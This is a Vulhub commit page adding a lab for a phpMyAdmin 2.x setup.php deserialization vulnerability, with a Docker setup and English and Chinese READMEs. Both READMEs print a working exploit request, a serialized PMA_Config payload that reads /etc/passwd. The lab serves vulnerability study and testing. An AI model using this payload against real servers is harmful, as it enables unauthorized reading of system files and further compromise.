first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
This commit is contained in:
BIN
phpmyadmin/WooYun-2016-199433/1.png
Normal file
BIN
phpmyadmin/WooYun-2016-199433/1.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 69 KiB |
35
phpmyadmin/WooYun-2016-199433/README.md
Normal file
35
phpmyadmin/WooYun-2016-199433/README.md
Normal file
@@ -0,0 +1,35 @@
|
||||
# Phpmyadmin Scripts/setup.php Deserialization Vulnerability (WooYun-2016-199433)
|
||||
|
||||
[中文版本(Chinese version)](README.zh-cn.md)
|
||||
|
||||
Affected version: 2.x
|
||||
|
||||
## Setup
|
||||
|
||||
Run the following command to start phpmyadmin:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
Visit `http://your-ip:8080` and you will see the phpmyadmin home page. Because there is no connection to the database, we will get an error. But this vulnerability is not related to the database, so just ignore.
|
||||
|
||||
## Exploit
|
||||
|
||||
Send the following package to read `/etc/passwd`:
|
||||
|
||||
```
|
||||
POST /scripts/setup.php HTTP/1.1
|
||||
Host: your-ip:8080
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 80
|
||||
|
||||
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
|
||||
```
|
||||
|
||||

|
33
phpmyadmin/WooYun-2016-199433/README.zh-cn.md
Normal file
33
phpmyadmin/WooYun-2016-199433/README.zh-cn.md
Normal file
@@ -0,0 +1,33 @@
|
||||
# phpmyadmin scripts/setup.php 反序列化漏洞(WooYun-2016-199433)
|
||||
|
||||
phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。
|
||||
|
||||
## 环境搭建
|
||||
|
||||
执行如下命令启动phpmyadmin:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
环境启动后,访问`http://your-ip:8080`,即可看到phpmyadmin的首页。因为没有连接数据库,所以此时会报错,但我们这个漏洞的利用与数据库无关,所以忽略。
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
发送如下数据包,即可读取`/etc/passwd`:
|
||||
|
||||
```
|
||||
POST /scripts/setup.php HTTP/1.1
|
||||
Host: your-ip:8080
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 80
|
||||
|
||||
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
|
||||
```
|
||||
|
||||

|
6
phpmyadmin/WooYun-2016-199433/docker-compose.yml
Normal file
6
phpmyadmin/WooYun-2016-199433/docker-compose.yml
Normal file
@@ -0,0 +1,6 @@
|
||||
version: '2'
|
||||
services:
|
||||
web:
|
||||
image: vulhub/phpmyadmin:2.8.0.4
|
||||
ports:
|
||||
- "8080:80"
|
Reference in New Issue
Block a user